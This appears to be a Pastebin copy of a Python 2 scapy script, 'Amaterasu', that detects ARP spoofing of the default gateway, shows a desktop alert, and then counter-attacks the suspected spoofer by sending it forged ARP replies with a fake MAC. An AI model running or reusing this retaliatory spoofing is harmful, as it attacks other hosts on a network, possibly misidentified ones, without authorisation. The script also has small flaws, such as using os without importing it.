Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. #!/usr/bin/python
  2. # Amaterasu is tool for defense and counter attack againts arp spoofing
  3. # created by Alvin Aditya
  4. # and TDBP group
  5. # ver 1.0 Beta
  6. #
  7. #      This program is free software; you can redistribute it and/or modify
  8. #      it under the terms of the GNU General Public License as published by
  9. #      the Free Software Foundation; either version 2 of the License, or
  10. #      (at your option) any later version.
  11. #      
  12. #      This program is distributed in the hope that it will be useful,
  13. #      but WITHOUT ANY WARRANTY; without even the implied warranty of
  14. #      MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  15. #      GNU General Public License for more details.
  16. #      
  17. #      You should have received a copy of the GNU General Public License
  18. #      along with this program; if not, write to the Free Software
  19. #      Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
  20. #      MA 02110-1301, USA.
  21.  
  22. # ATTENTION !
  23. # before use this tool make sure :
  24. # "python-scapy" "python-notify" "python-gtk2" is installed
  25. # This tool just support GNU/Linux Distro eg: Ubuntu, Fedora(not tested)
  26.  
  27. # HOW TO RUN :
  28. # sudo ./amaterasu.py
  29.  
  30. import sys
  31. from scapy.all import * # use python-scapy
  32.  
  33. import pygtk           #
  34. pygtk.require('2.0')   # pygtk and pynotify required
  35. import pynotify        # for send notif to Desktop
  36.  
  37. pynotify.init("Urgency")
  38.  
  39. def Get_parameter(cmd):
  40.     try:
  41.         x=os.popen(cmd,'r')
  42.         parameter=x.readline()
  43.         parameter=parameter.strip('\n')
  44.         return parameter
  45.     except :
  46.         return Get_parameter(cmd)
  47.  
  48. # get the default gateway ip address
  49. gwip=Get_parameter('ip route list | grep "default" | cut -d" " -f3')
  50. print "gwip = ",gwip
  51. # get the default gateway mac address
  52. ans=srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=gwip+"/30"),timeout=2)
  53. gwmac=str(ans[0][0][1].hwsrc)
  54. print "gwmac = ",gwmac
  55.  
  56. # monitor
  57. def arp_monitor_callback(pkt):
  58.     if ARP in pkt and pkt[ARP].op in (1,2): # who-has or is-at
  59.         #print str(pkt[ARP].hwsrc)+"    "+str(pkt[ARP].psrc)
  60.         if str(pkt[ARP].psrc) == gwip and str(pkt[ARP].hwsrc) != gwmac:
  61.             spoofed = "00:12:aa:0b:ac:00"
  62.             if str(pkt[ARP].hwsrc) != spoofed: # prevent our attack detected as attack packet from enemy  
  63.                 print "spoof detected from "+str(pkt[ARP].hwsrc)+"    "+str(pkt[ARP].psrc)
  64.                 # Critical Urgency
  65.                 n = pynotify.Notification("Spoof Detected !", "from "+str(pkt[ARP].hwsrc)+"    "+str(pkt[ARP].psrc))
  66.                 n.set_urgency(pynotify.URGENCY_CRITICAL)
  67.                 n.set_timeout(3000) # 3 seconds
  68.                
  69.                 if not n.show():
  70.                     print "Failed to send notification"
  71.        
  72.                 # attack
  73.                 # arp spoof the attacker
  74.                 srp(Ether(dst=str(pkt[ARP].hwsrc))/ARP(op="is-at",psrc=gwip,hwsrc=spoofed),timeout=1)
  75.                 # flood the attacker
  76.                
  77.                 # recovery
  78.                 srp(Ether(dst=gwmac)/ARP(op="is-at",pdst=gwip+"/24"),timeout=1)
  79.  
  80. # main function
  81. sniff(prn=arp_monitor_callback, filter="arp", store=0)
  82.